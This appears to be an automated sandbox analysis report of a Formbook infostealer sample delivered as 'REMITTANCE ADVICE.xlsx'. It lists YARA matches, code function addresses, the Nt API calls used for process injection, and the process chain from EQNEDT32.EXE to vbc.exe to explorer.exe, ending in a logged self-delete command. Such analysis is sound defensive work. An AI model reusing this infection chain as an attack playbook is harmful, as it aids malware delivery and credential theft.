          Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00406043
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404618
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040681A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10012610
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000C4AF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000C8C7
          Source: C:\Users\Public\vbc.exeCode function: 4_2_100130F4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_100154FD
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000CCFC
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000D131
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1001453C
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1001174A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_10012B82
          Source: C:\Users\Public\vbc.exeCode function: 4_2_1000BFBB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C957
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041D16A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00401174
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BA0C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004012FB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BC66
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C7B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C5A7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C6C2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007BD06D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00743040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00747353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00742305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007663DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E63BF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0077D47D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C443E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00775485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00751489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00786540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C05E3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078A634
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00744680
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007757C3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074C7BC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C579A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076286D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074C85C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DF8EE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007BF8C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C5955
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C394B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007569FE
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007429B2
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E098E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007F3A83
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00767B00
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073FBD7
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007CDBDA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007C6BCB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007ECBA4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074CD5B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00770D3B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DFDDD
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075EE4C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00772E2F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076DF7C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750F3F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007B2FDC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007DCFB1
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041D16A
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00401174
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004012FB
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C5A7
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C6C2
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C957
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BA0C
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041BC66
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C7B
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00408C80
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00402FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027BE2E9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02861238
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027C7353
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_028663BF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027C2305
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027E63DB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027BF3CF
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0280A37B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027D905A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027C3040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027ED005
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027BE0C6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02862622
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0280A634
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027CE6C1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027C4680
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0284579A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027F57C3
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027CC7BC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027FD47D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027D1489
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027F5485
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027C351F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027DC5F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02806540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02873A83
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0286CBA4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0284DBDA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027E7B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027BFBD7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027E286D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027CC85C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0285F8EE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0286098E
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027D69FE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027C29B2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0284394B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02845955
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027DEE4C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027F2E2F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027EDF7C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0285CFB1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027D0F3F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027CCD5B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027F0D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0285FDDD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009D16A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009C5A7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009C6C2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009C957
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009BA0C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009BC66
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00088C7B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00088C80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00082FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0280373B appears 244 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02803F92 appears 132 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 027BDF5C appears 119 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 027BE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0282F970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007AF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0078373B appears 245 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0073E2A8 appears 41 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00783F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A4C0 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0073DF5C appears 123 times
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004185E0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418690 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418710 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004185DA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041868A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418714 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004187BA NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004185E0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418690 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418710 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004185DA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041868A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418714 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004187BA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027AFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_027B1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000985E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00098690 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00098710 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000987C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000985DA NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0009868A NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00098714 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_000987BA NtAllocateVirtualMemory,
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dll B6A12BC611F92D3D793CE5C3C9CFF8A906CA96BD6B1D5C0DA8EBF9080FF4428A
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 76E90000 page execute and read and write
          Source: REMITTANCE ADVICE.xlsxVirustotal: Detection: 35%
          Source: REMITTANCE ADVICE.xlsxReversingLabs: Detection: 43%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
